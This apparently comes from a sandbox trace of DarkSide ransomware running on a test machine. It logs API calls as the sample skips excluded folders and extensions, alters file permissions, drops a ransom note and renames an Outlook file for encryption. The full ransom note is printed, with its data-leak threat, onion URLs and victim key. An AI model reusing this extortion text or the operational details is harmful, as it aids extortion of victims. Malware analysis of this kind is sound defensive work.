returned -14 [0149.638] wcslen (_String="application data") returned 0x10 [0149.638] _wcsicmp (_Str1="boot", _Str2="Outlook Files") returned -13 [0149.638] wcslen (_String="boot") returned 0x4 [0149.638] _wcsicmp (_Str1="google", _Str2="Outlook Files") returned -8 [0149.638] wcslen (_String="google") returned 0x6 [0149.638] _wcsicmp (_Str1="mozilla", _Str2="Outlook Files") returned -2 [0149.638] wcslen (_String="mozilla") returned 0x7 [0149.638] _wcsicmp (_Str1="program files", _Str2="Outlook Files") returned 1 [0149.639] wcslen (_String="program files") returned 0xd [0149.639] _wcsicmp (_Str1="program files (x86)", _Str2="Outlook Files") returned 1 [0149.639] wcslen (_String="program files (x86)") returned 0x13 [0149.639] _wcsicmp (_Str1="programdata", _Str2="Outlook Files") returned 1 [0149.639] wcslen (_String="programdata") returned 0xb [0149.639] _wcsicmp (_Str1="system volume information", _Str2="Outlook Files") returned 4 [0149.639] wcslen (_String="system volume information") returned 0x19 [0149.639] _wcsicmp (_Str1="tor browser", _Str2="Outlook Files") returned 5 [0149.639] wcslen (_String="tor browser") returned 0xb [0149.639] _wcsicmp (_Str1="windows.old", _Str2="Outlook Files") returned 8 [0149.639] wcslen (_String="windows.old") returned 0xb [0149.639] _wcsicmp (_Str1="intel", _Str2="Outlook Files") returned -6 [0149.639] wcslen (_String="intel") returned 0x5 [0149.639] _wcsicmp (_Str1="msocache", _Str2="Outlook Files") returned -2 [0149.639] wcslen (_String="msocache") returned 0x8 [0149.639] _wcsicmp (_Str1="perflogs", _Str2="Outlook Files") returned 1 [0149.639] wcslen (_String="perflogs") returned 0x8 [0149.639] _wcsicmp (_Str1="x64dbg", _Str2="Outlook Files") returned 9 [0149.639] wcslen (_String="x64dbg") returned 0x6 [0149.639] _wcsicmp (_Str1="public", _Str2="Outlook Files") returned 1 [0149.639] wcslen (_String="public") returned 0x6 [0149.639] _wcsicmp (_Str1="all users", _Str2="Outlook Files") returned -14 [0149.639] wcslen (_String="all users") returned 0x9 [0149.639] _wcsicmp (_Str1="default", _Str2="Outlook Files") returned -11 [0149.639] wcslen (_String="default") returned 0x7 [0149.639] wcscpy (in: _Dest=0x44b0068, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\*" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\*") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\*" [0149.639] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\*") returned 0x2d [0149.640] wcscpy (in: _Dest=0x44b00c0, _Source="Outlook Files" | out: _Dest="Outlook Files") returned="Outlook Files" [0149.640] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x10000) returned 0x44d0078 [0149.640] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x10000) returned 0x44e0080 [0149.642] wcscpy (in: _Dest=0x44d0078, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files" [0149.642] GetNamedSecurityInfoW () returned 0x0 [0149.642] SetEntriesInAclW () returned 0x0 [0149.642] SetNamedSecurityInfoW () returned 0x0 [0149.643] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x2d578d8) returned 1 [0149.643] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x3fe83c | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0149.643] SetCurrentDirectoryW (lpPathName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\outlook files")) returned 1 [0149.644] strlen (_Str="----------- [ Welcome to DarkSide ] -------------> \r\n \r\n What happend? \r\n ---------------------------------------------- \r\n Your computers and servers are encrypted, backups are deleted. We use strong encryption algorithms, so you cannot decrypt your data. \r\n But you can restore everything by purchasing a special program from us - universal decryptor. This program will restore all your network. \r\n Follow our instructions below and you will recover all your data. \r\n \r\n Data Leak \r\n ---------------------------------------------- \r\n Dear Isolved, pay close attention to this message because it is very important. When penetrating your network, there was a global data leak from your servers. More 350Gb of DATA. Except that your network was fully encrypted. \r\n We have all the most important data from all your servers: Bases, E-mails, Accounting, Finance. If you do not get in touch within 72 hours, information about this incident will be posted on our blog, which is monitored by leading media in the U.S. and the world. \r\n \r\n Blog URL \r\n ---------------------------------------------- \r\n http://darksidedxcftmqa.onion/isolved/OLVrV9bQny0XcUSkk8y6cvFWox_2cRFUiz95xG-hYGKETYuH1rlnl2d5exhQ0jHu \r\n \r\n What guarantees? \r\n ---------------------------------------------- \r\n We value our reputation. If we do not do our work and liabilities, nobody will pay us. This is not in our interests. \r\n All our decryption software is perfectly tested and will decrypt your data. We will also provide support in case of problems. \r\n We guarantee to decrypt one file for free. Go to the site and contact us. \r\n \r\n How to get access on website? \r\n ---------------------------------------------- \r\n Using a TOR browser: \r\n 1) Download and install TOR browser from this site: https://torproject.org/ \r\n 2) Open our website: http://darksidfqzcuhtk2.onion/AZHT20L23HCABE7V5FLPMR50Y0LPCNWKLICOH3MP156YR8DTFJGUE935ZG0QYCT6 \r\n \r\n When you open our website, put the following data in the input form: \r\n Key: \r\n \r\n MDwY2fJ0wMOMksG1GCvkBclFQNBOoNOtoKM1UfDyDwuobpBZwC5VSc9Y3cd130WLEVnipGp6jBFSvhWyVQsa0J0ICcDu9ihtUQ5yYCtSPNWu0XNtNwXchonPQ0iMpRO0leoAYPOeLNbBNkz7xlWPAOBMSBKpVQn1if08n0xBOpY7xC8J9BFmbbkZutVMbLqVqGzF8Q31iGOIDpONYRDC6KQ1fZMZhHIiGXStZG8NtnZYvQQ94XKRhCuhWNfNh1SmyM0YPNMVAnslDpZLmveZmB1vNxinwAlMJj67lVkjwXQRdcRiemxRpX7gIx6zbuvkqtdYIBo1q3neaVNLyLxogP8b50tKxc0Uok1lxDfTsZ61wmNhbJiyh1FXvjgZGrvEuR2SGm5to0K6fIA8GIA8Viu2AhxUOafNcYSKXckS5hq0zYOXnITkTJFvStKKSOLzp39sYyPYmDkyIPPQUTGsoqCIti0Sb2BQFTGkQQeqvnhdTJZfzVKGobFXx0b2aWi1yYavjfLdOdVzVQJIVyeOYe610BOT4L4fRpO38eiAcwKuS1eRwskD2jP \r\n \r\n !!! DANGER !!! \r\n DO NOT MODIFY or try to RECOVER any files yourself. We WILL NOT be able to RESTORE them. \r\n !!! DANGER !!!") returned 0xa8f [0149.644] CreateFileW (lpFileName="README.c06622a1.TXT" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\outlook files\\readme.c06622a1.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1c [0149.644] WriteFile (in: hFile=0x1c, lpBuffer=0x514f30*, nNumberOfBytesToWrite=0xa8f, lpNumberOfBytesWritten=0x3fe80c, lpOverlapped=0x0 | out: lpBuffer=0x514f30*, lpNumberOfBytesWritten=0x3fe80c*=0xa8f, lpOverlapped=0x0) returned 1 [0149.645] CloseHandle (hObject=0x1c) returned 1 [0149.648] SetCurrentDirectoryW (lpPathName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 1 [0149.648] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\outlook files")) returned 0x10 [0149.648] PathAddBackslashW (in: pszPath="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files" | out: pszPath="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files\\") returned="" [0149.648] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files\\") returned 0x3a [0149.648] FindFirstFileExW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files\\*", fInfoLevelId=0x0, lpFindFileData=0x3fea6c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3fea6c) returned 0x2db8780 [0149.648] FindNextFileW (in: hFindFile=0x2db8780, lpFindFileData=0x3fea6c | out: lpFindFileData=0x3fea6c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5a7a9f80, ftCreationTime.dwHighDateTime=0x1d2fad7, ftLastAccessTime.dwLowDateTime=0xd7cf0be0, ftLastAccessTime.dwHighDateTime=0x1d6f256, ftLastWriteTime.dwLowDateTime=0xd7cf0be0, ftLastWriteTime.dwHighDateTime=0x1d6f256, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0149.649] FindNextFileW (in: hFindFile=0x2db8780, lpFindFileData=0x3fea6c | out: lpFindFileData=0x3fea6c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd7cf0be0, ftCreationTime.dwHighDateTime=0x1d6f256, ftLastAccessTime.dwLowDateTime=0xd7cf0be0, ftLastAccessTime.dwHighDateTime=0x1d6f256, ftLastWriteTime.dwLowDateTime=0xd7cf0be0, ftLastWriteTime.dwHighDateTime=0x1d6f256, nFileSizeHigh=0x0, nFileSizeLow=0xa8f, dwReserved0=0x0, dwReserved1=0x0, cFileName="README.c06622a1.TXT", cAlternateFileName="README~1.TXT")) returned 1 [0149.649] _wcsicmp (_Str1="README.c06622a1.TXT", _Str2="README.c06622a1.TXT") returned 0 [0149.649] FindNextFileW (in: hFindFile=0x2db8780, lpFindFileData=0x3fea6c | out: lpFindFileData=0x3fea6c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x5a868660, ftCreationTime.dwHighDateTime=0x1d2fad7, ftLastAccessTime.dwLowDateTime=0x5a868660, ftLastAccessTime.dwHighDateTime=0x1d2fad7, ftLastWriteTime.dwLowDateTime=0x8a4fb680, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x42400, dwReserved0=0x0, dwReserved1=0x0, cFileName="voeimd@djhreuu.uhd.pst", cAlternateFileName="VOEIMD~1.PST")) returned 1 [0149.649] _wcsicmp (_Str1="voeimd@djhreuu.uhd.pst", _Str2="README.c06622a1.TXT") returned 4 [0149.649] wcsstr (_Str="voeimd@djhreuu.uhd.pst", _SubStr="README") returned 0x0 [0149.649] _wcsicmp (_Str1="autorun.inf", _Str2="voeimd@djhreuu.uhd.pst") returned -21 [0149.649] wcslen (_String="autorun.inf") returned 0xb [0149.649] _wcsicmp (_Str1="boot.ini", _Str2="voeimd@djhreuu.uhd.pst") returned -20 [0149.649] wcslen (_String="boot.ini") returned 0x8 [0149.649] _wcsicmp (_Str1="bootfont.bin", _Str2="voeimd@djhreuu.uhd.pst") returned -20 [0149.649] wcslen (_String="bootfont.bin") returned 0xc [0149.649] _wcsicmp (_Str1="bootsect.bak", _Str2="voeimd@djhreuu.uhd.pst") returned -20 [0149.650] wcslen (_String="bootsect.bak") returned 0xc [0149.650] _wcsicmp (_Str1="desktop.ini", _Str2="voeimd@djhreuu.uhd.pst") returned -18 [0149.650] wcslen (_String="desktop.ini") returned 0xb [0149.650] _wcsicmp (_Str1="iconcache.db", _Str2="voeimd@djhreuu.uhd.pst") returned -13 [0149.650] wcslen (_String="iconcache.db") returned 0xc [0149.650] _wcsicmp (_Str1="ntldr", _Str2="voeimd@djhreuu.uhd.pst") returned -8 [0149.650] wcslen (_String="ntldr") returned 0x5 [0149.650] _wcsicmp (_Str1="ntuser.dat", _Str2="voeimd@djhreuu.uhd.pst") returned -8 [0149.650] wcslen (_String="ntuser.dat") returned 0xa [0149.650] _wcsicmp (_Str1="ntuser.dat.log", _Str2="voeimd@djhreuu.uhd.pst") returned -8 [0149.650] wcslen (_String="ntuser.dat.log") returned 0xe [0149.650] _wcsicmp (_Str1="ntuser.ini", _Str2="voeimd@djhreuu.uhd.pst") returned -8 [0149.650] wcslen (_String="ntuser.ini") returned 0xa [0149.650] _wcsicmp (_Str1="thumbs.db", _Str2="voeimd@djhreuu.uhd.pst") returned -2 [0149.650] wcslen (_String="thumbs.db") returned 0x9 [0149.650] _wcsicmp (_Str1="386", _Str2="pst") returned -61 [0149.650] wcslen (_String="386") returned 0x3 [0149.650] _wcsicmp (_Str1="adv", _Str2="pst") returned -15 [0149.650] wcslen (_String="adv") returned 0x3 [0149.650] _wcsicmp (_Str1="ani", _Str2="pst") returned -15 [0149.651] wcslen (_String="ani") returned 0x3 [0149.651] _wcsicmp (_Str1="bat", _Str2="pst") returned -14 [0149.651] wcslen (_String="bat") returned 0x3 [0149.651] _wcsicmp (_Str1="bin", _Str2="pst") returned -14 [0149.651] wcslen (_String="bin") returned 0x3 [0149.651] _wcsicmp (_Str1="cab", _Str2="pst") returned -13 [0149.651] wcslen (_String="cab") returned 0x3 [0149.651] _wcsicmp (_Str1="cmd", _Str2="pst") returned -13 [0149.651] wcslen (_String="cmd") returned 0x3 [0149.651] _wcsicmp (_Str1="com", _Str2="pst") returned -13 [0149.651] wcslen (_String="com") returned 0x3 [0149.651] _wcsicmp (_Str1="cpl", _Str2="pst") returned -13 [0149.651] wcslen (_String="cpl") returned 0x3 [0149.651] _wcsicmp (_Str1="cur", _Str2="pst") returned -13 [0149.651] wcslen (_String="cur") returned 0x3 [0149.651] _wcsicmp (_Str1="deskthemepack", _Str2="pst") returned -12 [0149.651] wcslen (_String="deskthemepack") returned 0xd [0149.651] _wcsicmp (_Str1="diagcab", _Str2="pst") returned -12 [0149.651] wcslen (_String="diagcab") returned 0x7 [0149.651] _wcsicmp (_Str1="diagcfg", _Str2="pst") returned -12 [0149.651] wcslen (_String="diagcfg") returned 0x7 [0149.651] _wcsicmp (_Str1="diagpkg", _Str2="pst") returned -12 [0149.651] wcslen (_String="diagpkg") returned 0x7 [0149.651] _wcsicmp (_Str1="dll", _Str2="pst") returned -12 [0149.651] wcslen (_String="dll") returned 0x3 [0149.651] _wcsicmp (_Str1="drv", _Str2="pst") returned -12 [0149.651] wcslen (_String="drv") returned 0x3 [0149.652] _wcsicmp (_Str1="exe", _Str2="pst") returned -11 [0149.652] wcslen (_String="exe") returned 0x3 [0149.652] _wcsicmp (_Str1="hlp", _Str2="pst") returned -8 [0149.652] wcslen (_String="hlp") returned 0x3 [0149.652] _wcsicmp (_Str1="icl", _Str2="pst") returned -7 [0149.652] wcslen (_String="icl") returned 0x3 [0149.652] _wcsicmp (_Str1="icns", _Str2="pst") returned -7 [0149.652] wcslen (_String="icns") returned 0x4 [0149.652] _wcsicmp (_Str1="ico", _Str2="pst") returned -7 [0149.652] wcslen (_String="ico") returned 0x3 [0149.652] _wcsicmp (_Str1="ics", _Str2="pst") returned -7 [0149.652] wcslen (_String="ics") returned 0x3 [0149.652] _wcsicmp (_Str1="idx", _Str2="pst") returned -7 [0149.652] wcslen (_String="idx") returned 0x3 [0149.652] _wcsicmp (_Str1="ldf", _Str2="pst") returned -4 [0149.652] wcslen (_String="ldf") returned 0x3 [0149.652] _wcsicmp (_Str1="lnk", _Str2="pst") returned -4 [0149.652] wcslen (_String="lnk") returned 0x3 [0149.652] _wcsicmp (_Str1="mod", _Str2="pst") returned -3 [0149.652] wcslen (_String="mod") returned 0x3 [0149.652] _wcsicmp (_Str1="mpa", _Str2="pst") returned -3 [0149.652] wcslen (_String="mpa") returned 0x3 [0149.652] _wcsicmp (_Str1="msc", _Str2="pst") returned -3 [0149.652] wcslen (_String="msc") returned 0x3 [0149.652] _wcsicmp (_Str1="msp", _Str2="pst") returned -3 [0149.652] wcslen (_String="msp") returned 0x3 [0149.652] _wcsicmp (_Str1="msstyles", _Str2="pst") returned -3 [0149.653] wcslen (_String="msstyles") returned 0x8 [0149.653] _wcsicmp (_Str1="msu", _Str2="pst") returned -3 [0149.653] wcslen (_String="msu") returned 0x3 [0149.653] _wcsicmp (_Str1="nls", _Str2="pst") returned -2 [0149.653] wcslen (_String="nls") returned 0x3 [0149.653] _wcsicmp (_Str1="nomedia", _Str2="pst") returned -2 [0149.653] wcslen (_String="nomedia") returned 0x7 [0149.653] _wcsicmp (_Str1="ocx", _Str2="pst") returned -1 [0149.653] wcslen (_String="ocx") returned 0x3 [0149.653] _wcsicmp (_Str1="prf", _Str2="pst") returned -1 [0149.653] wcslen (_String="prf") returned 0x3 [0149.653] _wcsicmp (_Str1="ps1", _Str2="pst") returned -67 [0149.653] wcslen (_String="ps1") returned 0x3 [0149.653] _wcsicmp (_Str1="rom", _Str2="pst") returned 2 [0149.653] wcslen (_String="rom") returned 0x3 [0149.653] _wcsicmp (_Str1="rtp", _Str2="pst") returned 2 [0149.653] wcslen (_String="rtp") returned 0x3 [0149.653] _wcsicmp (_Str1="scr", _Str2="pst") returned 3 [0149.653] wcslen (_String="scr") returned 0x3 [0149.653] _wcsicmp (_Str1="shs", _Str2="pst") returned 3 [0149.653] wcslen (_String="shs") returned 0x3 [0149.653] _wcsicmp (_Str1="spl", _Str2="pst") returned 3 [0149.653] wcslen (_String="spl") returned 0x3 [0149.653] _wcsicmp (_Str1="sys", _Str2="pst") returned 3 [0149.653] wcslen (_String="sys") returned 0x3 [0149.653] _wcsicmp (_Str1="theme", _Str2="pst") returned 4 [0149.653] wcslen (_String="theme") returned 0x5 [0149.653] _wcsicmp (_Str1="themepack", _Str2="pst") returned 4 [0149.654] wcslen (_String="themepack") returned 0x9 [0149.654] _wcsicmp (_Str1="wpx", _Str2="pst") returned 7 [0149.654] wcslen (_String="wpx") returned 0x3 [0149.654] _wcsicmp (_Str1="lock", _Str2="pst") returned -4 [0149.654] wcslen (_String="lock") returned 0x4 [0149.654] _wcsicmp (_Str1="key", _Str2="pst") returned -5 [0149.654] wcslen (_String="key") returned 0x3 [0149.654] _wcsicmp (_Str1="hta", _Str2="pst") returned -8 [0149.654] wcslen (_String="hta") returned 0x3 [0149.654] _wcsicmp (_Str1="msi", _Str2="pst") returned -3 [0149.654] wcslen (_String="msi") returned 0x3 [0149.654] _wcsicmp (_Str1="pdb", _Str2="pst") returned -15 [0149.654] wcslen (_String="pdb") returned 0x3 [0149.654] _wcsicmp (_Str1="sql", _Str2="pst") returned 3 [0149.654] wcslen (_String="sql") returned 0x3 [0149.654] _wcsicmp (_Str1="sqlite", _Str2="pst") returned 3 [0149.654] wcslen (_String="sqlite") returned 0x6 [0149.654] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\outlook files")) returned 0x10 [0149.654] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x10000) returned 0x4500090 [0149.655] wcscpy (in: _Dest=0x4500090, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files" [0149.655] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files") returned 0x39 [0149.655] wcscpy (in: _Dest=0x4500104, _Source="voeimd@djhreuu.uhd.pst" | out: _Dest="voeimd@djhreuu.uhd.pst") returned="voeimd@djhreuu.uhd.pst" [0149.655] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files\\voeimd@djhreuu.uhd.pst", dwFileAttributes=0x80) returned 1 [0149.655] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files\\voeimd@djhreuu.uhd.pst" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\outlook files\\voeimd@djhreuu.uhd.pst"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x65c [0149.655] SetFilePointerEx (in: hFile=0x65c, liDistanceToMove=0xffffff70, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0149.655] ReadFile (in: hFile=0x65c, lpBuffer=0x3fe8f4, nNumberOfBytesToRead=0x90, lpNumberOfBytesRead=0x3fe984, lpOverlapped=0x0 | out: lpBuffer=0x3fe8f4*, lpNumberOfBytesRead=0x3fe984*=0x90, lpOverlapped=0x0) returned 1 [0149.656] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x3fe8f4, Length=0x80) returned 0xbcac1050 [0149.656] RtlComputeCrc32 (PartialCrc=0x1050, Buffer=0x3fe8f4, Length=0x80) returned 0xe62c5159 [0149.656] RtlComputeCrc32 (PartialCrc=0x5159, Buffer=0x3fe8f4, Length=0x80) returned 0x483eb1c5 [0149.656] RtlComputeCrc32 (PartialCrc=0xb1c5, Buffer=0x3fe8f4, Length=0x80) returned 0x1ece357 [0149.656] RtlComputeCrc32 (PartialCrc=0xe357, Buffer=0x3fe8f4, Length=0x80) returned 0x63268cde [0149.656] CloseHandle (hObject=0x65c) returned 1 [0149.656] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x10000) returned 0x4510098 [0149.657] wcscpy (in: _Dest=0x4510098, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files\\voeimd@djhreuu.uhd.pst" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files\\voeimd@djhreuu.uhd.pst") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files\\voeimd@djhreuu.uhd.pst" [0149.657] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files\\voeimd@djhreuu.uhd.pst") returned 0x50 [0149.657] wcscpy (in: _Dest=0x4510138, _Source=".c06622a1" | out: _Dest=".c06622a1") returned=".c06622a1" [0149.657] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files\\voeimd@djhreuu.uhd.pst" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\outlook files\\voeimd@djhreuu.uhd.pst"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files\\voeimd@djhreuu.uhd.pst.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\outlook files\\voeimd@djhreuu.uhd.pst.c06622a1"), dwFlags=0x8) returned 1 [0149.660] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files\\voeimd@djhreuu.uhd.pst.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\outlook files\\voeimd@djhreuu.uhd.pst.c06622a1"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x48000000, hTemplateFile=0x0) returned 0x65c [0149.660] CreateIoCompletionPort (FileHandle=0x65c, ExistingCompletionPort=0x5dc, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x5dc [0149.660] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x80104) returned 0x5240020 [0149.667] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x450f51e3 [0149.667] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x40a75b6 [0149.667] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x4d107f54 [0149.667] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x4d444155 [0149.667] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x784d5564 [0149.667] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x1140d584 [0149.667] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x17cbf961 [0149.667] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x65c28447 [0149.670] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x5240094, Length=0x80) returned 0xc284e10 [0149.670] RtlComputeCrc32 (PartialCrc=0x4e10, Buffer=0x5240094, Length=0x80) returned 0xe315f6b4 [0149.670] RtlComputeCrc32 (PartialCrc=0xf6b4, Buffer=0x5240094, Length=0x80) returned 0x2ff2314a [0149.670] RtlComputeCrc32 (PartialCrc=0x314a, Buffer=0x5240094, Length=0x80) returned 0x3fdffb04 [0149.670] RtlComputeCrc32 (PartialCrc=0xfb04, Buffer=0x5240094, Length=0x80) returned 0x17c2333e [0149.670] PostQueuedCompletionStatus (CompletionPort=0x5dc, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x5240020) returned 1 [0149.670] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x4500090) returned 1 [0149.670] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x4510098) returned 1 [0149.670] FindNextFileW (in: hFindFile=0x2db8780, lpFindFileData=0x3fea6c | out: lpFindFileData=0x3fea6c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0149.671] FindClose (in: hFindFile=0x2db8780 | out: hFindFile=0x2db8780) returned 1 [0149.671] _wcsicmp (_Str1="backup", _Str2="Outlook Files") returned -13 [0149.671] wcslen (_String="backup") returned 0x6 [0149.671] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x44d0078) returned 1 [0149.671] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x44e0080) returned 1 [0149.672] FindNextFileW (in: hFindFile=0x2db8740, lpFindFileData=0x3fecec | out: lpFindFileData=0x3fecec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb23b97f0, ftCreationTime.dwHighDateTime=0x1d58267, ftLastAccessTime.dwLowDateTime=0x6f2c2210, ftLastAccessTime.dwHighDateTime=0x1d567c1, ftLastWriteTime.dwLowDateTime=0x6f2c2210, ftLastWriteTime.dwHighDateTime=0x1d567c1, nFileSizeHigh=0x0, nFileSizeLow=0xa4d4, dwReserved0=0x0, dwReserved1=0x0, cFileName="PuwBlfUakQWQJF00DEBu.docx", cAlternateFileName="PUWBLF~1.DOC")) returned 1 [0149.672] _wcsicmp (_Str1="PuwBlfUakQWQJF00DEBu.docx", _Str2="README.c06622a1.TXT") returned -2 [0149.672] wcsstr (_Str="PuwBlfUakQWQJF00DEBu.docx", _SubStr="README") returned 0x0 [0149.672] _wcsicmp (_Str1="autorun.inf", _Str2="PuwBlfUakQWQJF00DEBu.docx") returned -15 [0149.672] wcslen (_String="autorun.inf") returned 0xb [0149.672] _wcsicmp (_Str1="boot.ini", _Str2="PuwBlfUakQWQJF00DEBu.docx") returned -14 [0149.672] wcslen (_String="boot.ini") returned 0x8 [0149.672] _wcsicmp (_Str1="bootfont.bin", _Str2="PuwBlfUakQWQJF00DEBu.docx") returned -14 [0149.672] wcslen (_String="bootfont.bin") returned 0xc [0149.672] _wcsicmp (_Str1="bootsect.bak", _Str2="PuwBlfUakQWQJF00DEBu.docx") returned -14 [0149.672] wcslen (_String="bootsect.bak") returned 0xc [0149.672] _wcsicmp (_Str1="desktop.ini", _Str2="PuwBlfUakQWQJF00DEBu.docx") returned -12 [0149.672] wcslen (_String="desktop.ini") returned 0xb [0149.672] _wcsicmp (_Str1="iconcache.db", _Str2="PuwBlfUakQWQJF00DEBu.docx") returned -7 [0149.672] wcslen (_String="iconcache.db") returned 0xc [0149.672] _wcsicmp (_Str1="ntldr", _Str2="PuwBlfUakQWQJF00DEBu.docx") returned -2 [0149.672] wcslen (_String="ntldr") returned 0x5 [0149.672] _wcsicmp (_Str1="ntuser.dat", _Str2="PuwBlfUakQWQJF00DEBu.docx") returned -2 [0149.672] wcslen (_String="ntuser.dat") returned 0xa [0149.672] _wcsicmp (_Str1="ntuser.dat.log", _Str2="PuwBlfUakQWQJF00DEBu.docx") returned -2 [0149.672] wcslen (_String="ntuser.dat.log") returned 0xe [0149.672] _wcsicmp (_Str1="ntuser.ini", _Str2="PuwBlfUakQWQJF00DEBu.docx") returned -2 [0149.672] wcslen (_String="ntuser.ini") returned 0xa [0149.672] _wcsicmp (_Str1="thumbs.db", _Str2="PuwBlfUakQWQJF00DEBu.docx") returned 4 [0149.673] wcslen (_String="thumbs.db") returned 0x9 [0149.673] _wcsicmp (_Str1="386", _Str2="docx") returned -49 [0149.673] wcslen (_String="386") returned 0x3 [0149.673] 